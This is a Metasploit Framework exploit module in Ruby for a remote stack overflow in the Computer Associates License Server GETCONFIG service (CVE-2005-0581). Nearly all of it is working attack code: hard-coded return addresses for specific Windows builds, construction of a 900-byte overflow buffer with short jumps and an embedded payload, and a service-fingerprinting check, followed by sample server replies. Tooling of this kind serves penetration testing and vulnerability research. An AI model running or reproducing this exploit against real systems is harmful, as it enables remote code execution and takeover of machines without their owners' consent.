##
# $Id: calicserv_getconfig.rb 8478 2010-02-13 16:16:13Z patrickw $
##

##
# This file is part of the Metasploit Framework and may be subject to
# redistribution and commercial restrictions. Please see the Metasploit
# Framework web site for more information on licensing and terms of use.
# http://metasploit.com/framework/
##

require 'msf/core'

# Metasploit exploit module for the Computer Associates License Server
# GETCONFIG stack overflow (CVE-2005-0581, see 'References' below).
#
# The service speaks a plain-text, space-delimited protocol over TCP
# (RPORT defaults to 10202). Both `check` and `exploit` drive it with a
# single "A0 GETCONFIG SELF <arg>" request; the only difference is the
# argument length ("0" for the benign probe, a 900-byte alphanumeric blob
# for the overflow), which is the natural detection signature for this
# traffic on the wire.
#
# Return addresses are hard-coded per OS / service-pack build of
# ws2help.dll (see 'Targets'), so the module is target-specific and there
# is no automatic target selection.
class Metasploit3 < Msf::Exploit::Remote
  Rank = NormalRanking

  include Msf::Exploit::Remote::Tcp

  # Registers module metadata, payload constraints and options.
  # Only RPORT is registered here; RHOST etc. come from the Tcp mixin.
  def initialize(info = {})
    super(update_info(info,
      'Name'           => 'Computer Associates License Server GETCONFIG Overflow',
      'Description'    => %q{
          This module exploits an vulnerability in the CA License Server network
        service. By sending an excessively long GETCONFIG packet the stack may
        be overwritten.
      },
      'Author'         =>
        [
          'Thor Doomen ', # original msf v2 module
          'patrick',      # msf v3 port :)
        ],
      'License'        => MSF_LICENSE,
      'Version'        => '$Revision: 8478 $',
      'References'     =>
        [
          [ 'CVE', '2005-0581' ],
          [ 'OSVDB', '14389' ],
          [ 'BID', '12705' ],
          [ 'URL', 'http://labs.idefense.com/intelligence/vulnerabilities/display.php?id=213' ],
        ],
      'Privileged'     => true,
      'DefaultOptions' =>
        {
          'EXITFUNC' => 'process',
        },
      # 'Space' (600) plus the payload offset used in `exploit` (272) stays
      # inside the 900-byte buffer built there. 0x20 is a bad char
      # presumably because the request format is space-delimited (compare
      # the probe sent in `check`); rand_text_alphanumeric already avoids
      # both bad chars for the filler.
      'Payload'        =>
        {
          'Space'    => 600,
          'BadChars' => "\x00\x20",
          'StackAdjustment' => -3500,
        },
      'Platform'       => 'win',
      'Targets'        =>
        [
          # As much as I would like to return back to the DLL or EXE,
          # all of those modules have a leading NULL in the
          # loaded @ address :(

          # name, jmp esi, writable, jmp edi
          #['Automatic', {} ],
          #
          # patrickw - tested OK Windows XP English SP0-1 only 20100214
          ['Windows 2000 English',      { 'Rets' => [ 0x750217ae, 0x7ffde0cc, 0x75021421 ] } ], # ws2help.dll esi + peb + edi
          ['Windows XP English SP0-1',  { 'Rets' => [ 0x71aa16e5, 0x7ffde0cc, 0x71aa19e8 ] } ], # ws2help.dll esi + peb + edi
          ['Windows XP English SP2',    { 'Rets' => [ 0x71aa1b22, 0x71aa5001, 0x71aa1e08 ] } ], # ws2help.dll esi + .data + edi
          ['Windows 2003 English SP0',  { 'Rets' => [ 0x71bf175f, 0x7ffde0cc, 0x71bf1a2c ] } ], # ws2help.dll esi + peb + edi
        ],
      'DisclosureDate' => 'Mar 02 2005'))

    register_options(
      [
        Opt::RPORT(10202),
      ], self.class)
  end

  # Fingerprints the service without sending the overflow.
  #
  # Connects, reads the greeting, sends a benign "A0 GETCONFIG SELF 0" and
  # looks for an OS<...> field in the reply. Returns CheckCode::Detected
  # (not Vulnerable) when the field is present: the reply is not compared
  # against any version, so a match only shows that a CA License Server is
  # answering, not that it is unpatched. Anything else is CheckCode::Safe.
  def check
    connect
    banner = sock.get_once # greeting is read but not inspected here
    sock.put("A0 GETCONFIG SELF 0")
    res = sock.get_once
    disconnect

    # A nil reply (no data before get_once returned) simply fails the match.
    if (res =~ /OS\<([^\>]+)/)
      print_status("CA License Server reports OS: #{$1}")
      return Exploit::CheckCode::Detected
    end

    return Exploit::CheckCode::Safe
  end

  # Builds the oversized GETCONFIG argument and sends it.
  #
  # The greeting is checked for the literal "GETCONFIG", but a mismatch is
  # only logged with print_status — the module does not abort and sends the
  # request regardless. The buffer is 900 random alphanumeric bytes with
  # the target's three 'Rets' and the encoded payload patched in at the
  # fixed offsets annotated below; the payload is written at offset 272.
  def exploit
    connect

    banner = sock.get_once
    if (banner !~ /GETCONFIG/)
      print_status("The server did not return the expected greeting!")
    end

    # exploits two different versions at once >:-)
    # 144 -> return address of esi points to string middle
    # 196 -> return address of edi points to string beginning
    # 148 -> avoid exception by patching with writable address
    # 928 -> seh handler (not useful under XP SP2)

    buff = rand_text_alphanumeric(900)
    buff[142, 2] = Rex::Arch::X86.jmp_short(8)         # jmp over addresses
    buff[144, 4] = [target['Rets'][0]].pack('V')       # jmp esi
    buff[148, 4] = [target['Rets'][1]].pack('V')       # writable address
    buff[194, 2] = Rex::Arch::X86.jmp_short(4)         # jmp over address
    buff[196, 4] = [target['Rets'][2]].pack('V')       # jmp edi
    buff[272, payload.encoded.length] = payload.encoded

    sploit = "A0 GETCONFIG SELF #{buff}"

    sock.put(sploit)

    handler
    disconnect
  end

end

=begin
Sample GETCONFIG replies observed from different server builds, kept for
fingerprinting reference (the OS<...> field is what `check` matches on):

eTrust:
A0 GCR HOSTNAMEHARDWARELOCALEIDENT1IDENT2IDENT3IDENT4OSOLFFILE<0 0 0>SERVERVERSION<0 1.61.0>NETWORK<192.168.3.22 unknown 255.255.255.0>MACHINECHECKSUMS<0 0 0 0 0 0 0 00 0 0 0>RMTV<1.3.1>

BrightStor:
A0 GCR HOSTNAMEHARDWARELOCALEIDENT1IDENT2IDENT3IDENT4OSOLFFILE<0 0 0>SERVERVERSION<3 1.54.0>NETWORK<11.11.11.111 unknown 255.255.255.0>MACHINECHECKSUMS<0 0 0 0 0 0 0 0 0 0 0 0>RMTV<1.00>

lic98rmt.exe v0.1.0.15:
A0 GCR HOSTNAMEHARDWARELOCALEIDENT1IDENT2IDENT3IDENT4OSOLFFILE<0 0 0>SERVERVERSION<3 1.61.0>NETWORK<192.168.139.128 unknown 255.255.255.0>MACHINECHECKSUMS<0 0 0 0 0 0 0 0 0 0 0 0>RMTV<1.00>
=end